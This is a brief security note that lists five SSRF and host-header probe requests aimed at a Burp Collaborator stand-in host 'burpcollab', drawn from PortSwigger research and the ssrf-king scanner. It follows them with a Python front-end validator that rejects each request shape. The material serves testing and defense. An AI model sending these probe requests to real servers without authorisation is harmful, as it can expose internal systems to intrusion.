Reference:
https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
GET http://burpcollab/some/endpoint HTTP/1.1
Host: example.com
and
GET @burpcollab/some/endpoint HTTP/1.1
Host: example.com
and
GET /some/endpoint HTTP/1.1
Host: example.com:80@burpcollab
and
GET /some/endpoint HTTP/1.1
Host: burpcollab
and
GET /some/endpoint HTTP/1.1
Host: example.com
X-Forwarded-Host: burpcollab
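
On the receiving side, a front end can reject each of the five request shapes above before routing. The following is an added example, not code from the referenced research or from the ssrf-king project; ALLOWED_HOSTS, check_request and the sample requests are constructed for illustration, and it assumes the front end serves only example.com.

```python
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"example.com"}  # assumption: the only vhost this front end serves

def check_request(raw: str, allowed=ALLOWED_HOSTS) -> list[str]:
    """Return the reasons a raw HTTP/1.1 request head should be rejected."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return ["bad-request-line"]
    target = parts[1]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    findings = []
    if target.lower().startswith(("http://", "https://")):
        # absolute-form target: its authority, not Host, may decide routing
        if (urlsplit(target).hostname or "") not in allowed:
            findings.append("absolute-uri-foreign-host")
    elif not target.startswith("/") and target != "*":
        findings.append("malformed-target")  # e.g. "@host/path"
    hosts = headers.get("host", [])
    if len(hosts) != 1:
        findings.append("host-count")
    for host in hosts:
        if "@" in host:
            findings.append("host-userinfo")
        elif host.lower().split(":")[0] not in allowed:
            findings.append("host-not-allowed")
    for fwd in headers.get("x-forwarded-host", []):
        if fwd.lower().split(":")[0] not in allowed:
            findings.append("forwarded-host-not-allowed")
    return findings

# Constructed samples mirroring the five shapes listed above, plus a clean request.
SAMPLES = {
    "absolute": "GET http://burpcollab/some/endpoint HTTP/1.1\r\nHost: example.com\r\n\r\n",
    "at-target": "GET @burpcollab/some/endpoint HTTP/1.1\r\nHost: example.com\r\n\r\n",
    "userinfo": "GET /some/endpoint HTTP/1.1\r\nHost: example.com:80@burpcollab\r\n\r\n",
    "host": "GET /some/endpoint HTTP/1.1\r\nHost: burpcollab\r\n\r\n",
    "xfh": "GET /some/endpoint HTTP/1.1\r\nHost: example.com\r\nX-Forwarded-Host: burpcollab\r\n\r\n",
    "clean": "GET /some/endpoint HTTP/1.1\r\nHost: example.com\r\n\r\n",
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(f"{label:10} {check_request(raw) or 'ok'}")
```
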
Project URL:
https://github.com/ethicalhackingplayground/ssrf-king#scanning-options